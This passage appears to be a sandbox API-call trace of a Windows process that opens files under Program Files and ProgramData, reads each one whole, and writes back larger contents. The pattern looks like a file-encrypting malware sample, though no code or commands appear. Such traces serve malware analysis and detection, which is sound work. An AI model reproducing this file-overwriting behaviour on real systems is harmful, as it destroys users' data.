(x86)\\Mozilla Firefox\\dictionaries\\en-US.aff" (normalized: "c:\\program files (x86)\\mozilla firefox\\dictionaries\\en-us.aff"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0149.373] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0149.373] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xcca [0149.373] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0149.373] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.373] ReleaseMutex (hMutex=0x168) returned 1 [0149.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="en-US.aff", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0149.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="en-US.aff", cchWideChar=9, lpMultiByteStr=0x1f732cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="en-US.aff", lpUsedDefaultChar=0x0) returned 9 [0149.373] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0xcca, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x331f2bc*=0xcca, lpOverlapped=0x0) returned 1 [0149.377] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0149.378] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1252, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x331f2d0*=0x1252, lpOverlapped=0x0) returned 1 [0149.378] CloseHandle (hObject=0x1f0) returned 1 [0149.378] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja" (normalized: "c:\\program files (x86)\\mozilla firefox\\omni.ja"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0149.379] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0149.379] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x771d55 [0149.379] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0149.379] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.380] ReleaseMutex (hMutex=0x168) returned 1 [0149.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="omni.ja", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0149.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="omni.ja", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omni.ja", lpUsedDefaultChar=0x0) returned 7 [0149.380] ReadFile (in: hFile=0x1f0, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0149.385] ReadFile (in: hFile=0x1f0, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0149.398] ReadFile (in: hFile=0x1f0, lpBuffer=0x288f948, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0x2000, lpOverlapped=0x0) returned 1 [0149.400] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x76fd55 [0149.400] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x2000, lpOverlapped=0x0) returned 1 [0149.404] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x76fd55 [0149.409] WriteFile (in: hFile=0x1f0, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x331f28c*=0x2588, lpOverlapped=0x0) returned 1 [0149.410] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0149.410] WriteFile (in: hFile=0x1f0, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0149.411] WriteFile (in: hFile=0x1f0, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0149.411] WriteFile (in: hFile=0x1f0, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0x2000, lpOverlapped=0x0) returned 1 [0149.411] CloseHandle (hObject=0x1f0) returned 1 [0149.411] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\shortcuts_log.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\shortcuts_log.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0152.980] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0152.980] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x142 [0152.981] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0152.981] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0152.990] ReleaseMutex (hMutex=0x168) returned 1 [0152.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="shortcuts_log.ini", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0152.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="shortcuts_log.ini", cchWideChar=17, lpMultiByteStr=0x1f88c44, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="shortcuts_log.ini", lpUsedDefaultChar=0x0) returned 17 [0152.992] ReadFile (in: hFile=0x204, lpBuffer=0x25e9758, nNumberOfBytesToRead=0x142, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25e9758*, lpNumberOfBytesRead=0x331f2bc*=0x142, lpOverlapped=0x0) returned 1 [0152.995] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0152.995] WriteFile (in: hFile=0x204, lpBuffer=0x25a5b98*, nNumberOfBytesToWrite=0x6ca, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a5b98*, lpNumberOfBytesWritten=0x331f2d0*=0x6ca, lpOverlapped=0x0) returned 1 [0152.996] CloseHandle (hObject=0x204) returned 1 [0152.997] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\maintenanceservice.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0153.017] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0153.017] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1d270 [0153.018] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0153.018] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.018] ReleaseMutex (hMutex=0x168) returned 1 [0153.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="maintenanceservice.exe", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0153.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="maintenanceservice.exe", cchWideChar=22, lpMultiByteStr=0x1f88c44, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="maintenanceservice.exe", lpUsedDefaultChar=0x0) returned 22 [0153.018] ReadFile (in: hFile=0x204, lpBuffer=0x25a5b78, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a5b78*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0153.026] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1c270 [0153.026] ReadFile (in: hFile=0x204, lpBuffer=0x25adbd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25adbd8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0153.098] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1c270 [0153.098] WriteFile (in: hFile=0x204, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0153.098] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0153.098] WriteFile (in: hFile=0x204, lpBuffer=0x25a7ba8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a7ba8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0153.099] CloseHandle (hObject=0x204) returned 1 [0153.099] CreateFileW (lpFileName="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft.office.infopath.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0153.126] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0153.126] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2fc [0153.126] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0153.126] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.126] ReleaseMutex (hMutex=0x168) returned 1 [0153.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.InfoPath.targets", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0153.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.InfoPath.targets", cchWideChar=33, lpMultiByteStr=0x1fa53fc, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.InfoPath.targets", lpUsedDefaultChar=0x0) returned 33 [0153.126] ReadFile (in: hFile=0x204, lpBuffer=0x25a7bc8, nNumberOfBytesToRead=0x2fc, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a7bc8*, lpNumberOfBytesRead=0x331f2bc*=0x2fc, lpOverlapped=0x0) returned 1 [0153.129] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0153.129] WriteFile (in: hFile=0x204, lpBuffer=0x28790d8*, nNumberOfBytesToWrite=0x884, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28790d8*, lpNumberOfBytesWritten=0x331f2d0*=0x884, lpOverlapped=0x0) returned 1 [0153.129] CloseHandle (hObject=0x204) returned 1 [0153.129] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\WinMail.exe" (normalized: "c:\\program files (x86)\\windows mail\\winmail.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0153.131] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Mail\\WinMail.exe", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Windows Mail\\WinMail.exe", lpFilePart=0x331f690*="WinMail.exe") returned 0x2f [0153.131] GetLastError () returned 0x5 [0153.131] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱Ḻ꧰Ƿ\x01") returned 0x13 [0153.131] LocalFree (hMem=0x69e2b0) returned 0x0 [0153.131] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0153.131] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0153.131] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0153.132] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0153.132] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\WinMail.exe" (normalized: "c:\\program files (x86)\\windows mail\\winmail.exe")) returned 0x26 [0153.132] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\spgagentservice.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\spgagentservice.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0153.132] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\spgagentservice.exe", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Windows Photo Viewer\\spgagentservice.exe", lpFilePart=0x331f690*="spgagentservice.exe") returned 0x3f [0153.133] GetLastError () returned 0x20 [0153.133] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="氀i̱폈H̱퐔H̱Ḻ꧰Ƿ\x01") returned 0x51 [0153.133] LocalFree (hMem=0x696c00) returned 0x0 [0153.133] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0153.133] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0153.133] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0153.133] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0153.133] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\spgagentservice.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\spgagentservice.exe")) returned 0x20 [0153.133] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0153.134] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0153.134] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x186 [0153.135] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0153.135] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.135] ReleaseMutex (hMutex=0x168) returned 1 [0153.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx.hxn", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0153.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx.hxn", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hx.hxn", lpUsedDefaultChar=0x0) returned 6 [0153.135] ReadFile (in: hFile=0x204, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x331f2bc*=0x186, lpOverlapped=0x0) returned 1 [0153.136] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0153.136] WriteFile (in: hFile=0x204, lpBuffer=0x25a7bc8*, nNumberOfBytesToWrite=0x70e, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a7bc8*, lpNumberOfBytesWritten=0x331f2d0*=0x70e, lpOverlapped=0x0) returned 1 [0153.137] CloseHandle (hObject=0x204) returned 1 [0153.137] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0153.241] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0153.241] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x170 [0153.246] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0153.246] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.246] ReleaseMutex (hMutex=0x168) returned 1 [0153.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSACCESS.DEV.14.1033.hxn", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0153.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSACCESS.DEV.14.1033.hxn", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSACCESS.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 27 [0153.246] ReadFile (in: hFile=0x1d8, lpBuffer=0x26a8de8, nNumberOfBytesToRead=0x170, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a8de8*, lpNumberOfBytesRead=0x331f2bc*=0x170, lpOverlapped=0x0) returned 1 [0153.247] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0153.248] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a7bc8*, nNumberOfBytesToWrite=0x6f8, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a7bc8*, lpNumberOfBytesWritten=0x331f2d0*=0x6f8, lpOverlapped=0x0) returned 1 [0153.248] CloseHandle (hObject=0x1d8) returned 1 [0153.248] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0153.250] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0153.250] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x16a [0153.250] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0153.250] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.250] ReleaseMutex (hMutex=0x168) returned 1 [0153.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OUTLOOK.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0153.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OUTLOOK.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x1f8fd5c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.OUTLOOK.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 26 [0153.250] ReadFile (in: hFile=0x1d8, lpBuffer=0x26a8de8, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a8de8*, lpNumberOfBytesRead=0x331f2bc*=0x16a, lpOverlapped=0x0) returned 1 [0153.252] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0153.252] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a7bc8*, nNumberOfBytesToWrite=0x6f2, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a7bc8*, lpNumberOfBytesWritten=0x331f2d0*=0x6f2, lpOverlapped=0x0) returned 1 [0153.252] CloseHandle (hObject=0x1d8) returned 1 [0153.252] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0156.724] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0156.724] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x15e [0156.724] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0156.724] 